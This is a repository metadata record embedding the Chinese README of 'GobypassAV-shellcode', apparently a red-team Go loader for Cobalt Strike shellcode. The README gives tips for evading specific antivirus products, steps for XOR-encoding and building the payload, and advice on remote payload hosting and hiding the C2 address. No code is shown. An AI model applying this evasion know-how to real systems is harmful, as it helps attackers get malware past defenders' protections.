{"id":13575229,"url":"https://github.com/Pizz33/GobypassAV-shellcode","last_synced_at":"2025-04-04T19:31:25.995Z","repository":{"id":156323913,"uuid":"629380527","full_name":"Pizz33/GobypassAV-shellcode","owner":"Pizz33","description":"shellcode免杀加载器，使用go实现，免杀bypass火绒、360、核晶、def等主流杀软","archived":false,"fork":false,"pushed_at":"2023-08-03T04:37:38.000Z","size":85,"stargazers_count":837,"open_issues_count":1,"forks_count":95,"subscribers_count":10,"default_branch":"main","last_synced_at":"2025-04-04T09:06:58.158Z","etag":null,"topics":["bypass","cobaltstrike","redteam","shellcode","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Pizz33.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-04-18T07:42:36.000Z","updated_at":"2025-04-02T04:13:29.000Z","dependencies_parsed_at":"2024-01-16T20:27:40.594Z","dependency_job_id":"83257c23-ac18-4979-a759-712e435ef902","html_url":"https://github.com/Pizz33/GobypassAV-shellcode","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Pizz33","download_url":"https://codeload.github.com/Pizz33/GobypassAV-shellcode/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247237678,"owners_count":20906329,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","cobaltstrike","redteam","shellcode","shellcode-loader"],"created_at":"2024-08-01T15:00:59.208Z","updated_at":"2025-04-04T19:31:25.959Z","avatar_url":"https://github.com/Pizz33.png","language":"Go","funding_links":[],"categories":["Go","红队\u0026渗透测试"],"sub_categories":[],"readme":"# GobypassAV-shellcode\n\ncobaltstrike免杀，实测过 bypass火绒、360、360核晶、360杀毒、def、金山毒霸等主流杀软\n\nshellcode写在文件里容易被提取特征，beacon远程加载免杀性和持久性会更好，但请求的地址容易被封禁和溯源，在实战中根据实际情况选择，并配合云函数或CDN进行C2地址隐匿\n\n| 杀软类型    | 免杀绕过技巧    |\n| ---- | ---- |\n| 火绒 | 编译参数限制多，对hash和字符串特征进行识别，静态能过动态基本不查杀，对很多go库调用报毒|\n| 360 | 单360查杀力不高，装了杀毒后直接儿子变爸爸，查杀力大大提升，对于简单的加密识别度较高，容易上线后云查杀过一会掉线，推荐使用分离加载方式，并使用反沙箱的代码延长马子时间|\n| 360核晶 | 开启后对整体查杀性能影响不大，避免使用进程注入的方式加载shellcode，无法执行大部分cmd命令和相关程序（使用bof插件进行替代）|\n| Defender | 新增许多cobaltstrike规则，推荐使用`Stageless`，免杀性比`Stage`好，4.5版本开启`sleep_mask`参数增强免杀性，对体积大的文件查杀度不高|\n\n\n详细教程请移步博客：https://pizz33.github.io/posts/4ac17cb886a9/\n\n食用方法：\n\n1、生成c的payload\n\n![image](https://user-images.githubusercontent.com/88339946/232708666-a8e28b1b-2502-4bbc-91a9-d88e5ff44e9d.png)\n\n2、`go run encode.go` or `python xor64.py` 对shellcode进行加密\n\n![image](https://user-images.githubusercontent.com/88339946/232708833-9709b6c6-59b3-455a-aaa5-e4a92e549c3b.png)\n\n3、加密后的结果填到代码里编译运行 `go build decode.go` \n\n远程加载把加密后的字符串放到云端，把云端地址填到对应位置生成 （可放到vps上或使用oss云存储等）\n\n(这里大多报错为缺少依赖，运行 `go mod init` \u0026 `go mod tidy` 拉取即可)\n\n免杀效果：\n\n![image](https://user-images.githubusercontent.com/88339946/234937098-ba1f7e9b-0c8e-4455-a84b-46a6ae53159f.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234936629-b80e9b97-8a85-485e-9097-bbf4091a4d39.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234928250-bcf2952f-c345-4241-b33c-73e053b54dd5.png)\n\n![image](https://user-images.githubusercontent.com/88339946/233016193-23d034da-951a-400a-9720-fffa2b21ba81.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234165227-7a26383c-6f8f-484a-8bfb-6d35d2880e59.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234788023-2a9fd53a-2c02-4467-9ef1-6c654106680d.png)\n\n\n[![Star History Chart](https://api.star-history.com/svg?repos=Pizz33/GobypassAV-shellcode\u0026type=Date)](https://star-history.com/#star-history/star-history\u0026Date)\n\n项目仅供进行学习研究，切勿用于任何非法未授权的活动，如个人使用违反安全相关法律，后果与本人无关\n\n站在巨人的肩膀上学习，参考借鉴以下师傅的项目，特别感谢\n\nhttps://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc\n\nhttps://github.com/7BitsTeam/EDR-Bypass-demo \n\nhttps://www.yuque.com/aufeng/aufeng_good/aq09p0#yNorm\n\nhttps://mp.weixin.qq.com/s/xiFbSE6goKFqLAlyACi83A\n\nhttps://github.com/timwhitez/Doge-Loader\n\nhttps://github.com/TideSec/GoBypassAV\n\nhttps://www.crisprx.top/archives/515\n\nhttps://github.com/Ne0nd0g/go-shellcode\n\nhttps://github.com/piiperxyz/AniYa\n\nhttps://github.com/safe6Sec/GolangBypassAV\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FPizz33%2FGobypassAV-shellcode","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FPizz33%2FGobypassAV-shellcode","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FPizz33%2FGobypassAV-shellcode/lists"}